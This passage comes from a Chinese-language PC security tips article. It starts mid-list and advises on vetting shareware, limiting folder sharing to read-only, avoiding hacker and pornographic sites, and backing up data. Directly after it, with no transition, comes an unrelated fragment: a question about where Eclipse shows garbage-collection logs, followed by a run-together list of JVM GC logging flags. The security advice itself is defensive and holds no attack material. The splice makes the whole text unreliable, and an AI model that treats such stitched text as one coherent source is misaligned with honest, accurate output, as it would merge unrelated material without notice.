(3)对将要在计算机上安装的共享软件进行甄别选择,尤其是那些你并不熟悉的,可以登录其官方网站了解详情;在安装共享软件时,不要总是心不在焉地一路单击“OK”按钮,而应仔细阅读各个步骤出现的协议条款,特别留意那些有关间谍软件行为的语句。 七、只在必要时共享文件夹 不要以为你在内部网上共享的文件是安全的,其实你在共享文件的同时就会有软件漏洞呈现在互联网的不速之客面前,公众可以自由地访问您的那些文件,并很有可能被有恶意的人利用和攻击。因此共享文件应该设置密码,一旦不需要共享时立即关闭。 一般情况下不要设置文件夹共享,以免成为居心叵测的人进入你的计算机的跳板。 如果确实需要共享文件夹,一定要将文件夹设为只读。通常共享设定“访问类型”不要选择“完全”选项,因为这一选项将导致只要能访问这一共享文件夹的人员都可以将所有内容进行修改或者删除。Windows98/ME的共享默认是“只读”的,其他机器不能写入;Windows2000的共享默认是“可写”的,其他机器可以删除和写入文件,对用户安全构成威胁。 不要将整个硬盘设定为共享。例如,某一个访问者将系统文件删除,会导致计算机系统全面崩溃,无法启动。 八、不要随意浏览黑客网站、色情网站 这点勿庸多说,不仅是道德层面,而且时下许多病毒、木马和间谍软件都来自于黑客网站和色情网站,如果你上了这些网站,而你的个人电脑恰巧又没有缜密的防范措施,哈哈,那么你十有八九会中招,接下来的事情可想而知。 九、定期备份重要数据 数据备份的重要性毋庸讳言,无论你的防范措施做得多么严密,也无法完全防止“道高一尺,魔高一丈”的情况出现。如果遭到致命的攻击,操作系统和应用软件可以重装,而重要的数据就只能靠你日常的备份了。所以,无论你采取了多么严密的防范措施,也不要忘了随时备份你的重要数据,做到有备无患!
eclipse gc日志在哪个窗口看
-XX:+PrintGC 输出GC日志-XX:+PrintGCDetails 输出GC的详细日志-XX:+PrintGCTimeStamps 输出GC的时间戳(以基准时间的形式)-XX:+PrintGCDateStamps 输出GC的时间戳(以日期的形式,如 2013-05-04T21:53:59.234+0800)-XX:+PrintHeapAtGC 在进行GC的前后打印出堆的信息-Xloggc:../logs/gc.log 日志文件的输出路径
